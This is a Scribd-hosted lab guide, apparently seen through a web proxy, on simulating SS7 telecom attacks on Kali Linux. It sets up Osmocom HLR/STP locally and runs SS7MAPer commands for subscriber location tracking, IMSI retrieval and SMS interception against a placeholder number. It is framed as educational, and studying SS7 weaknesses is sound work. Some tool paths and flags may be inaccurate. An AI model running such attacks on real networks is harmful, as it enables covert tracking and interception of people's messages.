100% found this document useful (1 vote)
104 views

SS7_Simulation_Lab_Guide

This document provides a guide for simulating SS7 attacks on a Kali Linux system for educational purposes. It outlines the SS7 architecture, installation and configuration of necessary tools, and steps to simulate attacks such as location tracking and SMS redirection. Additionally, it emphasizes the importance of conducting these simulations legally and without real network interaction.

Uploaded by

PAVANKUMAR KOTNI
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
104 views

SS7_Simulation_Lab_Guide

This document provides a guide for simulating SS7 attacks on a Kali Linux system for educational purposes. It outlines the SS7 architecture, installation and configuration of necessary tools, and steps to simulate attacks such as location tracking and SMS redirection. Additionally, it emphasizes the importance of conducting these simulations legally and without real network interaction.

Uploaded by

PAVANKUMAR KOTNI
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

SIMULATING SS7 ATTACKS ON KALI LINUX

For Educational & Legal Use Only - No real network interaction.

What You Will Achieve:

- Simulate an SS7 network on your Kali Linux system.

- Test simulated attacks like Location Tracking, IMSI Retrieval, SMS Redirection.

PART 1: UNDERSTAND THE SS7 ARCHITECTURE

- SS7 Protocols: SCCP, MAP, M3UA

- Components: HLR, STP, MSC, VLR

PART 2: INSTALL AND CONFIGURE TOOLS

Step 1: Update Kali

sudo apt update && sudo apt upgrade -y

sudo apt install git build-essential cmake autoconf automake libtool \

libtalloc-dev libpcsclite-dev libosmocore-dev wireshark python3-pip -y

Step 2: Install Osmocom Tools (osmo-hlr, osmo-stp)

git clone https://gitea.osmocom.org/cellular-infrastructure/osmo-hlr.git

cd osmo-hlr && autoreconf -fi && ./configure && make && sudo make install

git clone https://gitea.osmocom.org/cellular-infrastructure/osmo-stp.git

cd osmo-stp && autoreconf -fi && ./configure && make && sudo make install

Step 3: Configuration

sudo mkdir -p /usr/local/etc/osmocom

Configure osmo-hlr.cfg and osmo-stp.cfg as provided in the guide.


Step 4: Run Components

osmo-hlr -c /usr/local/etc/osmocom/osmo-hlr.cfg

osmo-stp -c /usr/local/etc/osmocom/osmo-stp.cfg

PART 3: SIMULATE ATTACK USING SS7MAPer

git clone https://github.com/Lochnair/ss7maper.git

cd ss7maper && pip3 install -r requirements.txt

Edit config.ini with host=127.0.0.1, port=2905, timeout=2

Simulated Attacks:

python3 ss7maper.py --target +919999999999 --locate

python3 ss7maper.py --target +919999999999 --imsi

python3 ss7maper.py --target +919999999999 --intercept

PART 4: WIRESHARK MONITORING

sudo wireshark &

Use filter: m3ua || sccp || map

LEGAL NOTICE: Simulation only. Never connect to real networks.

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy